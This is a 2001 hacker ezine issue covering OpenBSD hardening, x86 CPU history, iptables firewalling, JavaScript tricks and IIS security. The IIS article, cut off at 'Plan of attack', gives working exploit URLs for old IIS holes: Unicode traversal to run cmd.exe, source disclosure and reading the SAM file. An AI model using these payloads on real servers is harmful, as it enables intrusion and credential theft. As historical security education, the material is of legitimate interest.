Copy Link
Add to Bookmark
Report

infosurge Issue 09

eZine's profile picture
Published in 
infosurge
 · 3 years ago

  


____\\\\/________ _________________
| | \\| _/ _/ | 99999999999999
|_______|___\\ | __| | | 9999990 99999999
| _| \\___|_____|________|_________ 999990 999999999
|_____ \\ | | _| | _ | 999990 99999999
| | | | | | | __/ 9999999999
\\________/________|____|______ |_______| 999999999
|_______| 999999999
..
:
:.........................
:.
.......................: :..............................
: :
.: Official Web Site - http://infosurge.rendrag.net :
: :
: Official Submissions - phase5@cmdrkeen.net :
: Issue Editor - lym@thepentagon.com :.
`: :
: Issue #9: Tuesday, April 10th, 2001 ......:
: ..:...
:..................................ùù..............: :
:....... `ùù'
:
...:.....................................
: :
: .........................:............
:... : ..contents :
....ùù.............:...........:...... :
: `ùù' : ..:..
: : :.:.;
: :
: :
: 001 An Overview of OpenBSD Security Satyricon :
: 002 Intel's x86 CPU Maticles :
: 003 Iptables for Linux 2.4 Technion :.
: 004 Advanced JavaScript Methods lymco :
: 005 IIS Security black-hand :
: 006 Overview of Recent and Future Hardware Maticles ..:
: 007 Tunnelling SSH via HTTP tengu :
: 008 HP-UX and the HP-9000/800 Series Unix server Kayjay :
.: 009 Phreaks, Geeks, and the inbetweens Rendrag :
.:., :.
: : TOTAL (113kb) :
: : :
`..: .....:.. .
:..................ùù............................................:..: ;
.; `ùù' :..;
:
:...
..:............................................
: :
: 001 An Overview of OpenBSD Security :
: ...:. .
:.:.. by Satyricon : :
:.:.;................;........................:.:
: ;. . .. . ..;. . :
; ;
;

OpenBSD is often noted for its code auditing and integrated crypto, but the
security features go far beyond this. OpenBSD was built from the ground up on
the model of being a fabric woven with security in mind, not a patchwork of
bug fixes and security updates. This has led to OpenBSD finally being recognized
today for what it is: the most secure operating system on earth. This article
aims to illustrate these features and provide practical examples of their
implication on production machines.

Encryption

One of the most astounding things about the information superhighway is the
number of people driving down it with their doors unlocked. Users and even
administrators still commonly employ systems where sensitive information such
as financial records and personal details are thrown over public networks as
clear text. This is largely due to the proliferation of cleartext protocols
such as telnet, rlogin, and http. OpenBSD solves these issues by containing
encrypted replacements by default: OpenSSH for telnet and rlogin and https
(OpenSSL). One of the first configuration tasks for an OpenBSD administrator
should be the correct setup of ssh and ssl to ensure system security. OpenSSH
is configured via two primary configuration files; some useful excerpts of
those files follow:

/etc/ssh_config (OpenSSH client configuration):

UseRsh no
FallBackToRsh no
# OpenSSH will never fall back
# to the cleartext RSH protocol.
ForwardX11 no
# Do not allow X windows forwarding
# through the SSH session.

/etc/sshd_config (OpenSSH server configuration):

Port 22
ListenAddress 0.0.0.0
# Listen on all active interfaces
HostKey /etc/ssh_host_key
# Store the key in the default location
ServerKeyBits 1664
# Generate a 1664 bit key (stronger
# crypto than by default)
LoginGraceTime 600
# Allow 600 seconds for a client to login
KeyRegenerationInterval 3600
# Generate a new key every 3600
# seconds (hourly)
PermitRootLogin no
# Do not allow clients to login directly as
# root, must use su
X11Forwarding no
# Do not allow X windows forwarding through
# the SSH session.
PermitEmptyPasswords no
# A password MUST be issued - no passwordless
# logins allowed.

With SSH configured using these or similar options, the next step in enabling
OpenBSD crypto is to set up OpenSSL-based https. This is a good replacement to
cleartext http when sensitive information is being parsed through CGI POSTs or
similar methods. The official documentation for mod_ssl (located by default in
/var/www/htdocs/manual/mod/mod_ssl/ on OpenBSD systems) provides more detailed
configuration information, but the process is three relatively simple steps:

1. Generate a server key and self-signed x.509 certificate:
* Generate a server.key:
openssl genrsa -des3 -out server.key 1024
Place this file in /etc/ssl

* Generate a CSR (Certificate Signing Request):
openssl req -new -key server.key -out server.csr
Place this file in /etc/ssl

* Generate an RSA key for your CA (Certificate Authority):
openssl genrsa -des3 -out ca.key 1024
Place this file in /etc/ssl

* Generate an x.509 certificate for your CA:
openssl req -new -x509 -days 365 -key ca.key -out ca.crt
Place this file in /etc/ssl

* Sign your CSR:

* Sign your CSR:
./sign.sh server.crt
sign.sh comes packaged with the OpenSSL source distribution.

2. Edit /var/www/httpd.conf:
In the main section:
<IfDefine SSL>
Listen 80
Listen 443
</IfDefine>

<IfDefine SSL>
AddType application/x-x509-ca-cert .crt
AddType application/x-pkcs7-crl .crl
</IfDefine>

A <VirtualHost> tag for your domain:
<VirtualHost _default_:443>
# General setup for the virtual host
DocumentRoot /home/www/vhost/www.mydomain.net/htdocs
ServerName www.mydomain.net
ServerAdmin admin@mydomain.net
ErrorLog logs/error_log
TransferLog logs/access_log

# SSL Engine Switch:
# Enable/Disable SSL for this virtual host.
SSLEngine on

SSLCertificateFile /etc/ssl/server.crt
SSLCertificateKeyFile /etc/ssl/server.key
</VirtualHost>

3. Edit /etc/rc.conf to enable https:

* httpd_flags="-DSSL"


Code auditing

One of the largest problems with systems such as Linux is the inclusion of
unchecked third party software. If a vulnerability or security issue arises,
the third party must release a patch and the operating system vendor must then
redistribute this patch to their users. Not only this, but the third party
software is not in any way audited or checked for quality by the operating
system vendors and as such can be vulnerable for a long time before any sort
of fix is available to users (as happened numerous times with wu-ftpd). One of
the major steps forward for OpenBSD was when the entire source tree was
audited for buffer overflows and vulnerabilities. This has been constantly
maintained and has resulted in a product unparalleled in terms of security and
system integrity. In saying this, third party software is usually necessary
for the operation of a functional system, so OpenBSD makes it available via
the ports tree (http://www.daemonnews.org/200006/ports.html), a mechanism for
downloading, installing, and configuring third party software known to work
under OpenBSD or modified to do so. I won't go into details here of
configuring the ports tree -- this has been broadly documented elsewhere.

Security updates

As opposed to the majority of commercial vendors and even some other open
source projects, OpenBSD takes a "full disclosure" approach to any bugs or
vulnerabilities found in the source tree. This means that bugs are reported
immediately to users in their entirety, generally with a patch or workaround
included. The outcome of this is a system with no hidden bugs or "features"
shielded from the users, a prime example of which is the +.htr bug recently
in Microsoft IIS. Users wishing to monitor security updates as they occur can
subscribe to the security-announce (http://www.openbsd.org/mail.html) mailing
list, or monitor the patches posted to the OpenBSD errata page
(http://openbsd.org/errata.html). The patches provided are generally a source
tarball, which can be simply installed over the top of an existing system. An
example of this is the installation of the recent ftpd remote-root exploit
patch:

1. Download the patch:
wget ftp://ftp.openbsd.org/pub/OpenBSD/patches/2.7/common/019_ftpd.patch

2. Place the patch in your source root directory (usr/src):
mv 019_ftpd.patch /usr/src

3. Apply the patch to the source tree:
<code>patch -p0 019_ftpd.patch

4. Recompile ftpd:
cd libexec/ftpd
make obj && make depend && make && make install

5. Restart ftpd (which in this case has been started from inetd):
ps aux | grep inetd
root 19983 0.0 0.4 72 264 ?? Ss 29May00 3:03.68 inetd
kill -1 19983

As has been demonstrated, OpenBSD's "Secure by default" slogan holds merit in
all aspects of the system. Hopefully other open source projects (or -- dare I
suggest it -- commercial vendors) will start to take onboard this holistic
security approach to their own systems.

by David Jorm

. ....
..:............................................
: :
: 002 Intel's x86 CPU :
: ...:. .
:.:.. by Maticles : :
:.:.;................;........................:.:
: ;. . .. . ..;. . :
; ;
;

The Intel x86 started with the 8086, with a whole (not one more, or one less)
4.7MHz or 8Mhz, my TI-83 is more powerful then that :) These CPU's were 16-bit
(External and internal mind you), and didn't require any cooling at all.

Then the 8088 came along, with the same speed at the 8086, but featured a much
cheaper 8-bit external bus.

Then came the 80186, it was just an embedded (i.e. ram + rom + supportchips
onboard) version of the 80286.

The next update was the most significant in the x86 series, the humble 286.
Released in 1982, the 286 had 6, 8, 10, and 12 MHz varieties, was still 16-bit,
and featured a technologie called 'Protected mode' this meant that various
programs could share the memory without the fear of the CPU crashing, but once
in protected mode, the CPU wouldn't get out of it.

NEXT! - The 80386 was evolutionary, not revolutionary as people say, it
featured a 32-bit architecture, true multi-tasking and was in 12.5, 16, 20, 25
and 33 MHz flavours. There was also the 386SX which had a cheaper external
16-bit bus, sort of the 8088 of the 386. :)

Next up on the podium, is the 486, it came in 2 types, the 486 SX and the 486
DX, the difference was is that the DX included a FPU, and ranged from 20, 25,
33 and 50MHz. The 486 is what started the popularity in PC's.

Then the DX2 and DX4 were released with something not seen before, a 'clock
multiplier' which allowed the system bus to be multiplied to allow faster CPU
speed, this made 66MHz and 100MHz respectivly.

The Pentium and Pentium Pro were introduced in 1993, the Pentium featured a
brand new core with 64-bit transfers. The original Pentiums came in 60MHz and
66MHz varieties, and the 2nd generation pentiums ranged from 75MHz to 200MHz.

Just for a reference, Soundblaster Live has the same MIPS processing power of
a Pentium 75MHz. The 3rd Pentium generation (Not Pentium 3 - 3rd inclination of
the Pentium) featured MMX, and this varied from 266 to 233MHz, MMX is
MultiMedia eXtensions, and this CPU was considerably faster then the non-MMX
version.

In 1995, the Pentium Pro was released which was designed for the NT server
market, it was alot faster for multi-tasking then the original Pentium and did
true 32-bit calculations.

Next up was the Pentium II and Celeron family, the Pentium II was released in
a slot format, which was not compatible with earlier Pentiums, the P2 ranged
from 233MHz to 450MHz. Released in 1998, the P2 Xeon was the 'Pentium Pro' of
the P2, it was basically a Pentium II in a large cartridge, and had over 1MB
of cache on the darn thing.

In 1999 Intel released the Celeron which was a Pentium II, but with no on-die
cache and ran on a 66MHz bus. Because of the Celerons low heat levels, it was
a great success with overclockers.

Next is the PIII it was released in 1998 with 450MHz, and it appears to be
stabilzing at 1000MHz, there were different types of the PIII including the
'E'and the 'EB', and naturally, there was a PIII Xeon which was quite the
beast.

In 2000 Intel released the Celeron II which was a Celeron based on the PIII
core, but still had a 66MHz bus. Later on in the year, Intel released the
Celeron 800 with a 100MHz FSB.
Pentium 4 is Intels latest baby, starting at 1.3GHz going to a whooping 1.5GHz,
it runs on a 400MHz bus (100QDR) with the ailing RAMBUS, RAMBUS is a type of
ram which runs at speeds of 400MHz, but it is extremly expensive because of
licensing fees put on by RAMBUS Inc.

. ....
..:............................................
: :
: Iptables for Linux 2.4 :
: ...:. .
:.:.. by Technion : :
:.:.;................;........................:.:
: ;. . .. . ..;. . :
; ;

This article is for people who have been using ipchains for some time and
are looking at moving towards iptables. It's more about principles of
stateful firewalling than iptables syntax, though it is covered.
*BSD people who have been using ipf for years will probably find nothing
new here.

If you have a look at any attempt at a secure ipchains script, you'll
notice that it still has to leave many ports open simply for local services.
Here's the reason.
The outside world makes connections to your machine, and of course, some
of the ports that connections can be made on will be open with a service.
Other will be firewalled off as part of your script. But there's something
else that utilises ports, and that's your local browsing habits.
Fire up lynx, netscape, some ftp client, and you all know it opens a port
on a remote server. Where some people get confused is realising that it
needs to open a port on the local machine in order to get an answer. There's
nothing considered BOUND to that port, it's still not a bad security risk
as only the server you connected to can talk to that port. But the
fact remains that any script you write was going to have to open a large range
of ports. The default range for local ports is 1024:65535.
This range is chosen because it happens to be the range of ports that
a process not running as root can work with.
Opening a large range of ports isn't really that bad. If nothing runs
inside that range there is still no hacking potential. Once you try logging
everything however that looks like a connection or scan however, you find
yourself adding close to a hundred firewall rules just to get the effect
you desire.
Larger firewall rules may create the illusion of more security, but if you
can gain the same effect from smaller sets of rules you do better for two
reasons:
-The more complicated a script is, the more you'll find you left something
out.
-Before your computer can process a packet, it needs to traverse the whole
chain. If you are getting lots of connections, very large firewall scripts
can take up more CPU than you may want to waste.

The ipchains script I worked on attempted to minimise this a little
by using the proc filesystem to close this gap a little.. like this:
echo "32768 61000" >/proc/sys/net/ipv4/ip_local_port_range
Few services run inside this range, so only allowing input here is one
possibility.

Iptables turns the tables on all this by what is called stateful firewalling.
It allows you to set a rule up according to the state of the packet.
For example, observe the following:

$IPTABLES -A INPUT -i eth0 -m state --state ESTABLISHED,RELATED -j ACCEPT

Placing this as one of your first input rules will allow any input to your
machine if it is already associated with a connection, such as part
of a connection request you created, or any icmp - unreachable
packets which may be in response to a request you sent.
It also means that once a connection is established, further packets in
that stream won't have to traverse your whole chain, alleviating that CPU
usage issue I talked about. It also means with one line, we've sorted out
the issue of opening any ports- there's no need. If netscape opens a port
to browse, replies on that stream will be allowed. If it uses port 1025
to get a web page, we don't need to explicitly open port 1025 to let it
work correctly.

This allows for simple rules to accomplish big things. All we have to do
now is allow connections to specific ports we want a service run on.

A few other things to note about iptables. The main one is that packets
on the forward chain (now FORWARD they have all been capitalised) will no
longer traverse first through the input chain. This means that an input rule
denying input on port 21 won't stop you forwarding ftp connection requests.
This is good... we can deny more on our sever without worrying about
affecting those behind it.

Now let's go through a simple firewall. Despite its simplicity, it's plenty
enough for something like a web server sitting behind a more advanced firewall,
such as the script I'll talk about later.
I can't emphasise enough that despite what you usually read, good firewall
scripts involve sysctl (/proc filesystem) as much as humanly possible. There
are many options which can be set to reduce DoSing abilities and so forth.

First, let me go through the syntax differences so you know what I'm doing.
Find what you need at:
<http://netfilter.kernelnotes.org/unreliable-guides/packet-filtering-HOWTO/packet-filtering-HOWTO.linuxdoc-10.html>

This script assumes that the netfilter code was either built into the
kernel or the modules are already loaded. If not, you can load them with
these commands:
/sbin/insmod ip_tables
/sbin/insmod ip_conntrack
/sbin/insmod ip_conntrack_ftp

The rest will be dynamically loaded by the above as necessary.

#!/bin/bash
#Firewall script for iptables
#By Technion <technion@wiretapped.net <mailto:technion@wiretapped.net>>

#First, we aren't a router. We could use iptables to reject forwarding,
#but the command below will work at a lower level.
echo "0" > /proc/sys/net/ipv4/ip_forward

#Don't respond to broadcast pings. Again, this is just stronger than using
#a iptables rule- which we could also do.
echo "1" > /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts

#Flush all rules
/sbin/iptables -F

#Accept anything on an established connection

/sbin/iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT

#Acept local traffic

/sbin/iptables -A INPUT -i lo -j ACCEPT

#Accept icmp.
/sbin/iptables -A INPUT -p icmp -j ACCEPT

#Accept connections to port 80 for web usage

/sbin/iptables -A INPUT -p tcp --dport 80 -j ACCEPT

#Alow SSH from some address or address range
/sbin/iptables -A INPUT -p tcp --dport 22 -s <someaddress> -j ACCEPT

#Reject the rest

/sbin/iptables -A INPUT -j REJECT

And that is it! It doesn't really log anything, and its DoS'ing
prevention abilities are poor. Yet a web server behind a more advanced
script, maybe with an internal address and its firewall doing DNAT to get
web requests to it, has no reason to require any more than this.

It's important to finish with a "reject all" rule. This doesn't mean
everything will be rejected, just that which has not been allowed or
dropped by an earlier rule.

Now to the "ip_always_defrag" issue. Not many people really understood
this. It doesn't matter anyway, because it doesn't appear to exist in the
2.4.x kernel, and instead appears to be default. It's memory usage in
doing so can be tweaked, but until I learn more about it, I'll suggest
leaving it at its default.

And what script should you run on your firewall? Well the answer is you
should always write one best suited to you. But for a "skeleton" script,
head to my web page <http://www.coons.org> and you'll find the most recent
version of a script I have been working on. I'd post it here, but by the time
you finish reading it there will be a newer version on the site.
There's also an ipchains script there if you're interested.
Many thanks to all those that helped out.

. ....
..:............................................
: :
: 004 Advanced JavaScript Methods :
: ...:. .
:.:.. by Lymco : :
:.:.;................;........................:.:
: ;. . .. . ..;. . :
; ;

This article is intended to expand your knowledge of JavaScript methods.
We will cover: i) String Handling, ii) Preloading Images, iii) Mouseover
Imageswapping, iv) Browser Compatibility, v) Resolution Compatibility and
then finally, an introduction to Dynamic HTML Visibility.

Before we get started, I will quickly note that if you are unfamiliar with
JavaScript, I recommend the following sites:

1) http://hotwired.lycos.com/webmonkey/programming/javascript/tutorials/tutorial1.html
2) http://www.htmlogoodies.com/beyond/js.html
3) http://www.javascript.com

Once you're familiar with the basics of JavaScript, continue reading this
text.


(i) - String Handling
-----------------

1. variable.length
This returns the string length of 'variable'.

Example:
var your_name = prompt("What is your name?");
your_name_length = your_name.length
document.writeln("Hello "+your_name);
document.writeln("Your name is "+your_name_length+" charecters long");


2. variable.indexOf("x");
indexOf() returns the charecter index of 'x'.

Example:
email_address = prompt("What is your e-mail address?");
if (email_address.indexOf("@") == -1) {
document.writeln("Sorry, invalid e-mail address.");
} else {
document.writeln("Thankyou.");
}

Note:
As you should know, -1 means that the function 'didn't return true'.


3. variable.charAt(x);
charAt() returns the charecter at the index of 'x' in the variable.

Example:
variable_a = "Hello";
variable_b = "Irene";
variable_c = variable_a.charAt(0)+variable_b.charAt(0);
document.writeln(variable_c);

Note:
This function works like an array. ie: 0 returns the first letter,
1 the second, etc.


4. variable.substring(x, y);
substring() copies text from 'x' to 'y' in a variable.

Example:
string_a = "Hello how are you?";
first_word = string_a.substring(string_a.charAt(0), string_a.indexOf(" "));
document.writeln("The first word of \\""+string_a+"\\" is:");
document.writeln(first_word);


5. variable.split(":");
split() puts a variable, which has a delimiter (read: divider, so to
speak) between each index word, and places it into an array.

Example:
cities = "Perth, Sydney, Melbourne, Adelaide, Darwin, Hobart, Canberra"
var cities_array = cities.split(",");
document.writeln("The capital cities in Australia are as follows:<br>");
for (i=0;i<cities_array.length;i++) {
document.writeln(cities_array[i]+"<br>");
}



(ii) - Preloading Images
-----------------

All that is required is the use of the new Image() function.

Example:
<head>
<script>
if (document.images) {
var image1 = new Image();
image1.src = "image1.jpg";
}
</script>
</head>


How it works:
The above is the equivalent to:
<img src="image1.jpg" name="image1">

However, it does not include it inside the <body> tag. It merely downloads the
image, and does not display it on the active document.


(iii) - Mouseover ImageSwapping
-----------------

Basically, you have an image with an ID name, and you set an event to rewrite
the <img src=""> value to another image. Making it dynamically change. To my
knowledge this feature is only functional in IE and NS versions 4 and higher.

. the javascript
(this belongs in the <head> tag)

<script>

// First, we preload the images to save loading time
if (document.images) {
var image1 = new Image();
image1.src = "image1.jpg";

var image2 = new Image();
image2.src = "image2.jpg";
}

/*
This is the function we call to swap the images.
First argument, is the actual image id.
Second is the replacement image value.
*/

function imageswap(imageid, image) {
document [imageid].src = eval(image+".src");
}

</script>

. the images
First, download the two images:
dev.spanner.net/scripts/image1.jpg
dev.spanner.net/scripts/image2.jpg

and then:
(In the <body> tag)

<a href="javascript:history.go(-1)"
onmouseover="javascript:imageswap('image1','image2')"
onmouseout="javascript:imageswap('image1','image1')">
<img src="image1.jpg" name="image1" border="0"></a>

. finishing up
Well, that should work fine. Of course the first image uses image1.jpg as it's
source, and image 2 uses image2.jpg. By the way, YES, you can edit these.


(iv) - Browser Compatibility
-----------------
JavaScript can be a hard language to write for at times because of this issue.
For those whom are un-aware, JavaScript was created by Netscape. Since the
initial creation, alot of modifications have been applied, and syntax can
differ from browser to browser.

The core JavaScript syntax is handled the same with Netscape to Internet
Explorer, however new features, such as Dynamic HTML can be hard to implement
to be adaptable browser wide.

In this section of the article, I will show a few methods in how to write
adaptable code.

1. Lynx
Lynx is a UNIX text-only browser. It does not support JavaScript. So how do
we write compatible JavaScript for Lynx? We don't. Instead, we have to make
our website viewable for Lynx users.

Method 1:
Before, and after your JavaScript code, an option is to insert the <!-- and
// --> tags. What this does is 'comment' out all of the code. This way,
browsers which don't support JavaScript won't return a bunch of errors upon
loading.

Example:

<head>
<script>
<!--

function foobar() {
if (statement) {
command();
} else {
command2();
}
}

// -->
</script>


Method 2:
Most text-only (and old) web browsers support the HTML tag <noscript>. The tag
name speaks for itself. It is commonly used after the <script> tag.

Example:

<body>

<script>
<!--

/* Some fancy function which displays a JavaScript menu */
function foo_bar() {
// Insert code
}

// -->
</script>

<noscript>
about us | services | contact | links
</noscript>

</body>


Example 2:

<body>

<script>
<!--
/* Insert JavaScript code here */
// -->
</script>

<noscript>
This website uses JavaScript. Please use a recent version of either Netscape
Navigator or Microsoft Internet Explorer.
</noscript>


Extra Ideas:
If your website has frames, and you'd like to make it adaptable with text-only
browsers (or, of course, browsers which don't support frames), try the <noframe>
HTML tag.

Example:

<frameset rows="x,x">
<frame src="foo.bar" name="foobar">
<frame src="foo.bar2" name="foobar2">
</frameset>

<noframe>
Welcome to our no frames page.. (etc).
</noframe>


2. Internet Explorer and Netscape
In JavaScript, there is a method we can use to return the browser information.
This can be from the Application Name to the Version.

By capturing this information, we can use it to it's full potential and write
JavaScript depending on our web browser.

The simple way of doing this is as follows:

<script>
<!--
// This returns the browser name
browser_name = navigator.appName;

// This returns the browser version
browser_version = navigator.appVersion;

document.write("Your browser is:<br>");
document.write(browser_name+" version: "+browser_version);
// -->
</script>

navigator.appName returns "Microsoft Internet Explorer", for IE. As for
Netscape, it returns "Netscape".

Now lets put this information to good use:

<script>
<!--
if (navigator.appName == "Microsoft Internet Explorer") {
document.write("<marquee>Welcome to my website!</marquee>");
} else {
document.write("Welcome to my website!");
}
// -->
</script>

<noscript>
Welcome to my website!
</noscript>

As you may know, <marquee> is an IE only HTML tag. What the above JavaScript
does, is use the marquee tag only if the browser Application Name returns
"Microsoft Internet Explorer". If it's not IE, for arguments sake, lets say
that the user was running Netscape, it would write "Welcome to my website!"
in plain-text.

Then, after the JavaScript code, you may notice the <noscript> HTML tag. This
is for the users who use browsers such as Lynx, and displays the text
"Welcome to my website!".


The next example is my standard syntax for browser compatibility:

<script>
<!--

ie = "Microsoft Internet Explorer"
ns = "Netscape"
br = navigator.appName;
ver = navigator.appVersion;

if ((br == ie) && (ver >= "4")) {
// Perform an IE 4.0 or higher only function
} else if ((br == ns) && (ver >= "4")) {
// Perform a NS 4.0 or higher only function
} else {
// If not IE or NS version 4 or higher execute this function
}

// -->
</script>

<noscript>
Perform this for browsers which can't handle JavaScript.
</noscript>

The above is "Fill the blanks", so to speak. It's merely a template for
which you can insert your JavaScript code which is browser specific.


(v) - Resolution Compatibility
The diverse range of resolutions used by internet users is great. Statistics
show that the majority of users run their workstations at 800x600. I
personally find that the two most popular are 800x600, and 1024x768.

However, there are users who use resolutions exceeding 1280x1024
(which has been a popular resolution since the TNT2).

Saying this, it's important to make our websites viewable for all screen
resolutions.

Firstly, JavaScript has two main controls which returns your screen width,
and screen height values. So we can obtain the users screen resolution by
the following:


screen_resolution = screen.width+"x"+screen.height;

The above returns: widthxheight (eg: 1280x1024).

Lets assume that we'd like to have an image which stems right across the top
of our website. We've premade 3 graphics. These are 800x600, 1024x768, and
1280x1024, respectively. So, depending on our screen resolution it'll
load the best matching image.

<body>
<center>
<script>
<!--

reso = screen.width+"x"+screen.height;

if (reso == "800x600") {
document.write("<img src="800x600-header.jpg");
} else if (reso == "
1024x768") {
document.write("
<img src="1024x768-header.jpg");
} else if (reso == "1280x768") {
document.write("<img src="1280x1024-header.jpg");
} else {
document.write("
<img src="default-header.jpg");
}

// -->
</script>
</center>
</body>

An easier, and much quicker way would be:

<script>
<!--

reso = screen.width+"x"+screen.height;

if ((reso == "800x600") || (reso == "1024x768) || (reso == "1280x1024")) {
document.write("
<img src=\\""+reso+"\\"-header.jpg");
} else {
document.write("
<img src="default-header.jpg");
}

// -->
</script>


Alot of web designers don't have the time to make a seperate site for each
individual screen resolution. Nor do I consider it required. Instead, you
could write, for example, one page for the resolution 800x600. Then on your
main index file, have an event line to open a new window:

<head>
<script>
<!--
function load() {
window.open("800x600.html","main",height="600";width="800");
}
// -->
</script>
</head>

<body onload="javascript:load()">
If the window has not loaded click <a href="800x600.html" target="_new">
here</a>.
</body>



(vi) - Introduction to Dynamic HTML Visibility
After playing with Dynamic HTML a few years ago, I discovered a cool
implementation. It was the visibility attribute. This is the easiest,
yet most effective way to create some cool effects for your website.

One thing to note is that syntax varies from IE to Netscape.

1. Internet Explorer
With divisions, you can specify whether or not the division is visible or
not in the style property.

<div id="foo" style="visibility: hidden">foobar</div>

The two properties are "hidden" and "visible" for Internet Explorer.

Then, the above would be linked to:
foo.style.visibility

This is readable, and writeable. So we can overwrite the value and make it
dynamically change.

2. Netscape
With Netscape layers, you can also specify whether or not the layer is
visible in the visible property.

<layer name="foo" visibility="hide">

The two properties are "hide" and "show" for Netscape.

Then, the above would be linked to:
document.layers.foo.visibility

Once again, this is readable, and writeable.

--
Now that we know the basics of this, we can write some browser compatible
JavaScript to either write a <div> or <layer> tag, depending on our active
browser.

<body>
<script>
<!--

if ((br == ie) && (ver >= "4")) {
document.write('<div id="foobar" style="visibility:hidden">Example</div>');
} else if ((br == ns) && (ver >= "4")) {
document.write('<layer name="foobar" visibility="hide">Example</layer>');
} else {
// code for non IE/NS 4+ browsers..
}

// -->
</script>

<p>
<a href="javascript:show()">Show</a> | <a href="javascript:hide()">Hide</a><br>
</body>

That is the content for out <body> tag. As you can see, it's the same sort
of style as seen in the Browser Compatibility section.

Now for the <head> tag..

<head>

<script>
<!--
// Global variables
ie = "Microsoft Internet Explorer"
ns = "Netscape"
br = navigator.appName;
ver = navigator.appVersion;

function show() {
if ((br == ie) && (ver >= "4")) {
foobar.style.visibility = "visible";
} else if ((br == ns) && (ver >= "4") {
document.layers.foobar.visibility = "show";
}
}

function hide() {
if ((br == ie) && (ver >= "4")) {
foobar.style.visibility = "hidden";
} else if ((br == ns) && (ver >= "4") {
document.layers.foobar.visibility = "hide";
}
}

// -->
</script>

</head>
--

So the document should look like:

<html>

<head>

<script>
<!--
// Global variables
ie = "Microsoft Internet Explorer"
ns = "Netscape"
br = navigator.appName;
ver = navigator.appVersion;

function show() {
if ((br == ie) && (ver >= "4")) {
foobar.style.visibility = "visible";
} else if ((br == ns) && (ver >= "4")) {
document.layers.foobar.visibility = "show";
}
}

function hide() {
if ((br == ie) && (ver >= "4")) {
foobar.style.visibility = "hidden";
} else if ((br == ns) && (ver >= "4")) {
document.layers.foobar.visibility = "hide";
}
}

// -->
</script>

</head>

<body>
<script>
<!--

if ((br == ie) && (ver >= "4")) {
document.write('<div id="foobar" style="visibility:hidden">Example</div>');
} else if ((br == ns) && (ver >= "4")) {
document.write('<layer name="foobar" visibility="hide">Example</layer>');
} else {
// code for non IE/NS 4+ browsers..
}

// -->
</script>

<p>
<a href="javascript:show()">Show</a> | <a href="javascript:hide()">Hide</a> <br>
</body>

</html>

--

I didn't check the above code to see if it works. Check it out, debug it
if required, that's just some homework.

Disclaimer: I'm self taught at JavaScript, sincere apologies if you spot
a few errors in this text. E-mail me with corrections if required.

--
lymco <lym@thepentagon.com>
http://lymco.pad.au.com

. ....
..:............................................
: :
: 005 IIS Security :
: ...:. .
:.:.. by black-hand : :
:.:.;................;........................:.:
: ;. . .. . ..;. . :
; ;

IIS (Internet Information Server) is the web server that ships with Windows NT
Option Pack. It allows an NT server to host both static websites, as well as
dynamic content with ASP (Active Server Pages). This article will focus on
generic security holes that have been discovered in IIS through the years
since the release of version 4.0. According to netcraft
(http://www.netcraft.com/survey/) IIS runs on approximately 20% of the worlds
web servers, and is also very popular in online commerce applications.

Most of the time to exploit these security holes, all that we need is a web
browser and some time. As a default install, IIS has a lot of default
directories and scripts that can be used by an attacker to read or execute
files on the system. From an Administrators perspective, a good first step in
securing an IIS server would be to remove every default site and script.

Another good practice would be to locate all web sites and pages on a
different drive to the drive that NT is installed on, such that if there is a
security hole that is being exploited by an attacker, chances are they wont be
able to access system files or applications.

In this article I will only touch on a few of the IIS holes, and the holes that we only need
a web browser to find/exploit.


UNICODE Bug
------------

A recent hole was the IIS UNICODE bug, originally posted to a message board on
packetstorm (packetstorm.securify.com), then picked up by rfp after a posting
to the VULN-DEV mailing list. rfp's analysis of the bug and how to exploit it
can be found here:

http://www.wiretrip.net/rfp/p/doc.asp?id=57&iface=2

Microsoft released a patch for the issue (pity not many people have applied it).

To exploit the UNICODE bug, we need to traverse up directories from an
existing virtual directory and the sample directories are prefect for this
purpose. The VULN-DEV post and rfp's article outline the following method to
execute commands from a web browser:

http://www.system.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\\

the %c1%1c is an overlong UNICODE translation for the / character, which in
this case is used to traverse up directories then to cmd.exe. This example
only works (assuming that it is not patched) if /scripts is present on the
server, and /scripts is on the NT system drive of the server. An alternate
method is to use the /msadc directory, and to traverse up three times. The
/msadc virtual directory is a default directory created at install time by
IIS, and maps to the MSADC folder on the NT install drive. The following
example uses this directory to access and execute cmd.exe.

http://www.system.com/msadc/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+echo

should return "echo on", notice that we use /winnt/system32/ as the path to
cmd.exe, this might need to be changed accordingly.

You will notice that using this method, cmd.exe does not allow piping
(ie. > < << >>), if you simply make another copy of cmd.exe, then use this,
you can get arround this problem.


Real path
----------

Other security holes can be used to work out the exact system path to the web
directory. Requesting any file with the .idc, .ida, .idw or .idw extensions
can return the full path, such as

H:\\inetpub\\wwwroot\\hehe.idc not found

this can be used in conjunction with other holes to locate system files, and
to work around the system.


Plus Dot HTR
-------------

Appending +.htr to the end of a file or server side script can reveal the
source to that file. ASP programmers rely on the fact that their scripts are
stored on the server and aren't intended for viewing by remote users, hiding
common programming errors and buggy code. A security hole such as plus-dot-htr
can reveal the server side code to an attacker and potentially reveal new holes
and/or database server passwords.

For more about ASP and server side script holes see my ASP doc:

http://black.wiretapped.net/asp.txt


HTW/HTR
---------

A "200" return code to a /null.htw HTTP request indicates the presence of more
security holes that can be used to view server-side code (most times, it even
nicely formats and colours it in for you), a carefully constructed request can
reveal any file in the current working drive on the system, such as:


http://www.server.com/iissamples/issamples/oop/qfullhit.htw?ciwebhitsfile=/../../winnt/repair/sam._&cirestriction=none&$
which would show the repair SAM (note: you might not get far with the repair
SAM file).

In that example we used /iissamples/issamples/oop/qfullhit.htw, but could of
also used

/iissamples/issamples/oop/qfullhit.htw
/iissamples/issamples/oop/qsumrhit.htw
/isssamples/exair/search/qfullhit.htw
/isssamples/exair/search/qsumrhit.htw
/isshelp/iss/misc/iirturnh.htw

or, if in the cause of null.htw returning a "format of the QUERY_STRING is
invalid"
, we could use

http://www.server.com/null.htw?CiWebHitsFile=/file.asp%20&CiRestriction=none&CiHiliteType=Full


Showcode
---------

An oldie but a goodie, showcode.asp was a default script that would allow for
a remote user to view the source code to the servers ASP scripts. A problem
with the script was that the ASP was not filtering ../ which is used to
traverse up directories to view any file on the system in such a manner:

http://www.server.com/msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Samples/../../../../../file.txt

there is a similar hole in viewcode.asp, which is located in a few default
places (see "what to look for"), aswell as codebrws.asp.


Plan of attack
---------------

